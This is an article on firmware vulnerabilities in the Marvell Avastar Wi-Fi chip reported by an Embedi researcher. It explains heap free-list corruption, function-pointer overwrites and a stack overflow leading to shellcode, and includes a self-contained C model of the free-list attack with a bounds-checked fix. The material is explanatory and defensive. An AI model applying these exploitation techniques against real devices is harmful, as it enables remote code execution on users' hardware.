Vulnerability in widely used Wi-Fi chip firmware
A security flaw in the firmware of the Marvell Avastar 88W8897 SoC, the chip that provides Wi-Fi, Bluetooth and NFC in devices such as the PlayStation 4, Microsoft Surface tablets and laptops, the Xbox One, Samsung smartphones and Chromebooks, lets an attacker gain access to the device's memory (RAM). Marvell's firmware is built on ThreadX, a real-time operating system (RTOS) developed by Express Logic. Once the RTOS license fee is paid, the ThreadX source code becomes available, which makes it possible to study the firmware in depth, and this is what led to the discovery of the defects and vulnerabilities in it. Express Logic claims that ThreadX has been deployed more than 6 billion times in IoT devices and is the most widely used software in Wi-Fi chips worldwide.
Typically a Wi-Fi chip is initialized and controlled by a driver, which loads the chip's firmware when the device boots. Marvell's wireless SoC works with several Linux drivers that interface directly with the Linux kernel, such as mwifiex, whose source code is in the official Linux kernel tree, and mlan and mlinux, whose source code is in the steamlink-sdk repository. In both cases the driver gives the host operating system the ability to debug the Wi-Fi module and to read and write its memory.
One of the vulnerabilities reported in the firmware is an overflow of a memory block that occurs while the chip scans for Wi-Fi networks, a process that runs every five minutes even when the device is already connected to a network; knowing the name or password of any Wi-Fi network is therefore unnecessary. Denis Selianin, a researcher at Embedi, a company that works on IoT device security, says this is what makes the vulnerability interesting: it can be exploited during the scanning stage, before the device has connected to any Wi-Fi network. This is what makes remote code execution on a Samsung Chromebook possible.
In the report, Selianin describes two ways of exploiting the vulnerability: one that works on any ThreadX-based firmware under certain conditions, and one specific to Marvell's firmware; combining the two yields reliable exploitation. In the generic technique the attacker gains control of the pointer that links free memory blocks: by overwriting the link stored in a free block, the attacker decides where the next block will be allocated, and can therefore alter the firmware's flow of execution. Selianin adds that by controlling the address of the next allocated block, the attacker can point it at any location in memory they choose, which lets them execute malicious code.
Exploiting the vulnerability in Marvell's Avastar SoC also involves reverse engineering the data in the target memory block, which is feasible for the in-use blocks that follow the overflowed one. Some ThreadX memory blocks used by the Marvell firmware begin with a metadata header containing a function pointer that the firmware calls before the block is freed; overwriting that pointer is enough to run malicious code on the wireless SoC.
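The generic ThreadX technique described in the two paragraphs above (corrupting the link between free blocks so that a later allocation lands on an attacker-chosen address), reduced to a model a reader can run. This is an added example and is not code from Selianin's report, from ThreadX or from Marvell; the Marvell-specific function-pointer variant is not modelled. The block size, the pool layout, the `store_unchecked`/`store_checked` helpers and the `g_target` variable are assumptions made for the illustration; the only property borrowed from real block pools is that free blocks are chained through a pointer stored in their first word and the allocator trusts that pointer.

```c
/*
 * Simplified model of a ThreadX-style fixed-size block pool, written for
 * this article as an illustration; it is not ThreadX, Marvell or Embedi
 * code. Free blocks are chained through a pointer stored in their first
 * word, and the allocator trusts that pointer. An overflow from an in-use
 * block into the neighbouring free block therefore lets an attacker choose
 * the address returned by the next-but-one allocation, and whatever the
 * firmware then writes into its "new block" lands on attacker-chosen memory.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BLOCK_SIZE 32            /* assumed block size; real pools vary */
#define NUM_BLOCKS 4

typedef struct {
    uint8_t mem[BLOCK_SIZE * NUM_BLOCKS];   /* contiguous blocks */
    void   *free_list;                      /* head of the free-block chain */
} block_pool_t;

static block_pool_t pool;
static uint32_t g_target;   /* stands in for whatever firmware memory the attacker wants to hit */

/* Link every block to its successor; the last free block points to NULL. */
static void pool_create(block_pool_t *p)
{
    for (int i = 0; i < NUM_BLOCKS; i++) {
        void *next = (i + 1 < NUM_BLOCKS) ? (void *)(p->mem + (i + 1) * BLOCK_SIZE) : NULL;
        memcpy(p->mem + i * BLOCK_SIZE, &next, sizeof next);
    }
    p->free_list = p->mem;
}

/* Pop the head of the free chain. The stored link is used as-is, so a
 * corrupted link becomes the next head and, one allocation later, the
 * block handed back to the caller. */
static void *pool_alloc(block_pool_t *p)
{
    void *blk = p->free_list;
    if (blk != NULL)
        memcpy(&p->free_list, blk, sizeof p->free_list);
    return blk;
}

/* Unchecked copy into a block: models the bug class (attacker-sized data
 * copied without a length check); the real scan-parsing code is not shown. */
static void store_unchecked(uint8_t *blk, const uint8_t *data, size_t len)
{
    memcpy(blk, data, len);
}

/* Hardened variant: never write past the block. */
static void store_checked(uint8_t *blk, const uint8_t *data, size_t len)
{
    if (len > BLOCK_SIZE)
        len = BLOCK_SIZE;
    memcpy(blk, data, len);
}

/* Run the scenario and return the block handed out by the third allocation.
 * With the unchecked copy it is &g_target and the firmware's write lands
 * there; with the checked copy it is an ordinary pool block. */
static void *run_scenario(int hardened)
{
    pool_create(&pool);
    g_target = 0;

    uint8_t *in_use = pool_alloc(&pool);       /* block 0; block 1 is now the free-list head */

    /* Constructed attacker payload: fills block 0, then overruns into the
     * first word of block 1 with the address we want the allocator to return. */
    uint8_t payload[BLOCK_SIZE + sizeof(void *)];
    memset(payload, 'A', BLOCK_SIZE);
    void *fake_next = &g_target;
    memcpy(payload + BLOCK_SIZE, &fake_next, sizeof fake_next);

    if (hardened)
        store_checked(in_use, payload, sizeof payload);
    else
        store_unchecked(in_use, payload, sizeof payload);

    (void)pool_alloc(&pool);                   /* block 1: its (corrupted) link becomes the head */
    uint8_t *victim = pool_alloc(&pool);       /* attacker-chosen address when unhardened */

    /* The firmware initialises its "new block"; that write is the primitive. */
    uint32_t marker = 0x41414141u;
    memcpy(victim, &marker, sizeof marker);
    return victim;
}

int main(void)
{
    void *p = run_scenario(0);
    printf("unchecked: allocation returned %p, &g_target = %p, g_target = 0x%08x\n",
           p, (void *)&g_target, g_target);
    p = run_scenario(1);
    printf("checked:   allocation returned %p, g_target = 0x%08x\n", p, g_target);
    return 0;
}
```

The model shows why the overflow is worth more than a crash: the allocator never validates the link it pops, so one out-of-bounds write converts into a write of firmware-controlled content to an attacker-controlled address. A bounds check on the copy (the `store_checked` variant) keeps the link intact and the third allocation returns a real pool block.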
The other vulnerability the researcher discovered is a stack-based buffer overflow, which is easier to exploit because, as Selianin explains, the Linux kernel 3.8.13-mrvl that Marvell's driver runs on has no binary exploit mitigations. Exploiting it takes only two steps: the attacker calls the kernel function v7_flush_kern_cache_louis (so that the freshly written shellcode is visible to the instruction cache) and then jumps to the shellcode. In the video below, the Marvell Avastar Wi-Fi chip in a Valve Steam Link is exploited automatically and over the air, with no user interaction. Selianin says his motivation for publishing these vulnerabilities is that devices using these chips for wireless communication have not been examined closely enough by the security community, and that researchers should conduct more in-depth investigations of such devices.